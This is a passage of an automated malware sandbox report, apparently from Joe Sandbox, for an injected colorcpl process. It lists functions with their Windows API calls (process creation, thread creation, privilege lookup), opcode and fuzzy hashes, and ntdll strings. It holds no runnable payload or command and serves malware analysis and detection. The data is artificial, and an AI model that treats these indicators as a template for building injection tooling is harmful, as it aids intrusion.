APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02E29B82

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 7cb8b8e00a663c702ac6e28c29a16401a399c0fbeb4f487cf7e3203b8ab6d5a9
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 18015EB5D8020DABDF10EAE0DC45F9DB379AF44308F1091A4E90997241F630EB48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E3852D Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E38584

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 221018c70630355c3945f4be9cde0d68f597fcf157d7594868fa4e58ed563fe1
Instruction ID: f5a698c86bcd8cb4897b0167fd4c2a3825c47145309be74a12d8db259369480c
Opcode Fuzzy Hash: 221018c70630355c3945f4be9cde0d68f597fcf157d7594868fa4e58ed563fe1
Instruction Fuzzy Hash: 1A01F2B2208148AFCB44DF99DC80DEB7BBEAF8C314F158258FA5997201C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E38530 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02E38584

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 937325cd91130b930347d6d8af9ab95ae79703c91a88cb292bff9751ce75686d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 1F01AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E37000 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02E2CCC0,?,?), ref: 02E3703C

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 22922b3678a30951ea05c0364e8165abcf1c97a883438793b60566dc13a7c76e
Instruction ID: 10887e5725533107cdd5406b731495a825acfd50871d2cc3313667345116731b
Opcode Fuzzy Hash: 22922b3678a30951ea05c0364e8165abcf1c97a883438793b60566dc13a7c76e
Instruction Fuzzy Hash: 7DE092733C03043AE7316599AC02FA7B39CDB81B36F14502AFA0DEB2C1D595F80186E4

Uniqueness

Uniqueness Score: -1.00%

Function 02E36FF5 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02E2CCC0,?,?), ref: 02E3703C

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fa1aec983738b23677f6f310282824505db5b632da17fef0982d87cb8df31ec6
Instruction ID: 79deafe0fb77457a3daad3f2611913efdaf8acaf4f5d4c1bc35f08519c2b11ea
Opcode Fuzzy Hash: fa1aec983738b23677f6f310282824505db5b632da17fef0982d87cb8df31ec6
Instruction Fuzzy Hash: 51F09B727803103BD731AA59DC42FE777A99FD1B11F145129F649FB2C1C9A5F802CA94

Uniqueness

Uniqueness Score: -1.00%

Function 02E2D3F8 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02E27C63,?), ref: 02E2D42B

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c489f9cfab35c4d8d8d934c536ef76d0d1395e10e6ddd015c272a70f4a74044b
Instruction ID: 631eceaecd712601ee3274d79ed7c109ac6194b1d518d6b87339cb5c0768b927
Opcode Fuzzy Hash: c489f9cfab35c4d8d8d934c536ef76d0d1395e10e6ddd015c272a70f4a74044b
Instruction Fuzzy Hash: 8EE0D8637943082BE710A9F9BC03F6973D9DB45619F4880A6FD0DC62C3E941D51546E1

Uniqueness

Uniqueness Score: -1.00%

Function 02E38620 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E2CF92,02E2CF92,?,00000000,?,?), ref: 02E38650

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 504b90759255bda5579a3ea1635e0bdabac74a6cd75f39dc3be907eb8cb42815
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 91E01AB12002086BDB10DF49DC84EE737ADAF89650F018154BA0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02E38480 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02E33506,?,02E33C7F,02E33C7F,?,02E33506,?,?,?,?,?,00000000,00000000,?), ref: 02E384AD

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b0e1e5f0e976cabac1f7149f312d9d4271b9ce3f3a5b61f9995ad00c2bde35d9
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1AE012B1200208ABDB14EF99DC44EA777ADAF88650F118558BA085B241CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 02E2D400 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02E27C63,?), ref: 02E2D42B

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 73f26f398520aa9f350c01ff69ff2a7fa0960f661f8bea5fcdae3210d492d271
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 0CD0A7717D03043BE610FAA49C07F2633CD9B44B05F498064FA49D73C3DA54F40085A1

Uniqueness

Uniqueness Score: -1.00%

Function 02E3861C Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02E2CF92,02E2CF92,?,00000000,?,?), ref: 02E38650

Memory Dump Source

Source File: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_colorcpl.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c6bce7e31e79f8b0a64ac7f908781f6e826d0a82dcabac7758a78cc2bc07ea57
Instruction ID: 1db7da99303e8cfb1d24eaff3e4a695c390024a11259547b7c2521d35c292cbd
Opcode Fuzzy Hash: c6bce7e31e79f8b0a64ac7f908781f6e826d0a82dcabac7758a78cc2bc07ea57
Instruction Fuzzy Hash: 2FA002761B511C596827F2A53C04CFD5E4DC8C416F645E69AF10C818115717803841A0

Uniqueness

Uniqueness Score: -1.00%

Function 04E92C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E92C24

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5af22d6c656f7f0da9d0b0798092f2477da19abf0a6ab8d08dcc4b4d5065e3d
Instruction ID: 4a8b386552947de67d83e989d963e8c2afc25fc7a14ed099c524b5cc09c28a06
Opcode Fuzzy Hash: d5af22d6c656f7f0da9d0b0798092f2477da19abf0a6ab8d08dcc4b4d5065e3d
Instruction Fuzzy Hash: 7EB04C719015C595EE51A760460961679406B90705F15D4A1D2420655A4728E591E175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04E9293C
___swprintf_l.LIBCMT ref: 04E9295E
___swprintf_l.LIBCMT ref: 04E929A3
___swprintf_l.LIBCMT ref: 04ECA52E

Strings

::%hs%u.%u.%u.%u, xrefs: 04ECA527
::ffff:0:%u.%u.%u.%u, xrefs: 04ECA54E
:%u.%u.%u.%u, xrefs: 04ECA5B8
ffff:, xrefs: 04ECA504

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7bea30e577d775972ec469563412d2ce31a45fac8c19907dd43b3b9a6e550766
Instruction ID: dce171bd2197021943d29e60b0b447407a71674890b90ef213255efb1f16aeda
Opcode Fuzzy Hash: 7bea30e577d775972ec469563412d2ce31a45fac8c19907dd43b3b9a6e550766
Instruction Fuzzy Hash: 1251D6A5B002167BDF20DF58998097EF7F8BB48204710D969E555D7681E234FE108BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04F024A6
___swprintf_l.LIBCMT ref: 04F024E2
___swprintf_l.LIBCMT ref: 04F0257D
___swprintf_l.LIBCMT ref: 04F025A3
___swprintf_l.LIBCMT ref: 04F025C8
___swprintf_l.LIBCMT ref: 04F02608

Strings

::%hs%u.%u.%u.%u, xrefs: 04F0249E
:%u.%u.%u.%u, xrefs: 04F025FF
::ffff:0:%u.%u.%u.%u, xrefs: 04F024DA
ffff:, xrefs: 04F0247D, 04F0249D

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8c2b143e580e7fb2381fdf6f11bf66152ab931461a72fa9fb6bc9fcc06f46ca6
Instruction ID: c7ae630b3b1f8943b69f83294c311cec2217de7e5e0a2943deab7921d8095c21
Opcode Fuzzy Hash: 8c2b143e580e7fb2381fdf6f11bf66152ab931461a72fa9fb6bc9fcc06f46ca6
Instruction Fuzzy Hash: E351F175A00645AADB30DF98C89487FF7F9AB88204B05C49AE496D76C1E674FE01AB70

Uniqueness

Uniqueness Score: -1.00%

Function 04E87630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EC4655
Execute=1, xrefs: 04EC4713
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EC4742
CLIENT(ntdll): Processing section info %ws..., xrefs: 04EC4787
ExecuteOptions, xrefs: 04EC46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EC4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EC46FC

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 37c53a3f48325e340fba75a5a933471b41d70d59e9e5c09ceae72fd69b30d405
Instruction ID: 56df5b6d0666754462b1b21e90b7a938fb763ce0004ed9553d79420f55a0098a
Opcode Fuzzy Hash: 37c53a3f48325e340fba75a5a933471b41d70d59e9e5c09ceae72fd69b30d405
Instruction Fuzzy Hash: BE5116316402186AEF11BFA4DC95FAA73A8EF44309F2414ADD50DA72C0EB71BE42DE50

Uniqueness

Uniqueness Score: -1.00%

Function 04F26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 47a29ff6797ca3c78531e67b1516920cec807450e459d0641fa2698105ded44d
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 1A022671508351AFE705DF28CA90A6FBBE5EFC8704F54892DF9858B264DB31E906CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04E9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04E9B6BF

Strings

0, xrefs: 04E9B695
+, xrefs: 04E9B65A
-, xrefs: 04E9B650
0, xrefs: 04E9B66F

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 3810bd92c02ad048f552bada2391fef508ff4d2ba021885feb4953f0691822fe
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: E281BE70E052499EDF248F68E8917FEBBE2BF45318F186A1AD861A72D1D734BC408B51

Uniqueness

Uniqueness Score: -1.00%

Function 04F020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04F0214F
___swprintf_l.LIBCMT ref: 04F02172

Strings

%%%u, xrefs: 04F02146
[, xrefs: 04F0212B
]:%u, xrefs: 04F02169

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 4d2423014768408333f726a63e28d282b49a5a31b492d7bd5451e3e6e6e35f95
Instruction ID: 52ce3703b7edb09752ae12cc5ed9dad4125a92972bf9a69baf3107d7d92b785b
Opcode Fuzzy Hash: 4d2423014768408333f726a63e28d282b49a5a31b492d7bd5451e3e6e6e35f95
Instruction Fuzzy Hash: 49215176E00119ABDB10DFB9D844AAEBBF8EF94748F054156ED05E3280E730FD029BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04EC031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EC02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EC02BD

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 14b5565cde9a213abb0ad924fe085801fece520eb4f1bcf88f724f6588b4040d
Instruction ID: 7b205f47fac59735c7c7ec61174ede0e3a2d6ea9ee93d3ddc7f3fad6bec524c7
Opcode Fuzzy Hash: 14b5565cde9a213abb0ad924fe085801fece520eb4f1bcf88f724f6588b4040d
Instruction Fuzzy Hash: 07E19C30604741DFE725CF68C984B6AB7E0BF88328F141A5DE5A58B2E1E774F945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04E8BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 04EC7BAC
RTL: Resource at %p, xrefs: 04EC7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EC7B7F

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: c0ef29bc566ade5b03ed686e16b718d6acaa8905e23a6dc9a58d18f5ff98b283
Instruction ID: 70921bbcf5741a5e0f9d7e2492abd72302fc087dd0bf9dc7ca7649ca1e5fb2d9
Opcode Fuzzy Hash: c0ef29bc566ade5b03ed686e16b718d6acaa8905e23a6dc9a58d18f5ff98b283
Instruction Fuzzy Hash: 0941BF353007029FDB24EE25CD40B6AB7E6EB88718F001A1DF95E9B281DB71F8068B91

Uniqueness

Uniqueness Score: -1.00%

Function 04E8B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EC728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EC7294
RTL: Re-Waiting, xrefs: 04EC72C1
RTL: Resource at %p, xrefs: 04EC72A3

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 74985c8fd79856e13d76a44983606b9efd470858b1bb07f3e22df118c0ccd8ae
Instruction ID: f0e4712ffa66b7e16a0ad27e5df5d0f7009d33f909117c8fb9fcf77385587f5d
Opcode Fuzzy Hash: 74985c8fd79856e13d76a44983606b9efd470858b1bb07f3e22df118c0ccd8ae
Instruction Fuzzy Hash: 1E410F71700602AFEB24EF25CD41B66B7A5FB84718F14261DF959EB280EB20F842CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 04F02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04F0238D
___swprintf_l.LIBCMT ref: 04F023B3

Strings

]:%u, xrefs: 04F023AA
%%%u, xrefs: 04F02384

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: e3ed8d16b73252e3593c2e97d3f95c394344f5f38218ac8b0299ff73cae95373
Instruction ID: 72dfcd22a30020cac9d4c1ed551f6e2819e167311a8e2da1b0b9293fe8b32fb0
Opcode Fuzzy Hash: e3ed8d16b73252e3593c2e97d3f95c394344f5f38218ac8b0299ff73cae95373
Instruction Fuzzy Hash: 43318672A002199FDB20DF29DC44BEEB7F9EB84714F454595E849E3280EB30BE459FA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E97D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04E97E8B

Strings

+, xrefs: 04E97DE8
-, xrefs: 04E97DDD

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 565399febc3535ec62b37a2e5af1efce3c3b1b5addd505da21d92fee88edd774
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: D691A370E20206DBEF24DF69C881ABEB7E5BF45728F14651AE855E72D0E730AD84C720

Uniqueness

Uniqueness Score: -1.00%

Function 04E59126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04E59191
@, xrefs: 04E59175

Memory Dump Source

Source File: 00000004.00000002.4449812792.0000000004E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true

Associated: 00000004.00000002.4449812792.0000000004F49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004F4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.4449812792.0000000004FBE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4e20000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 190869c8322f4ccd2fe96d759da812d203b35b09ea892f48fb611c55b8746e26
Instruction ID: 97891e6705b652f148d2f12b93ef3efc8877e3507e578ee1867a0faf2461fc5b
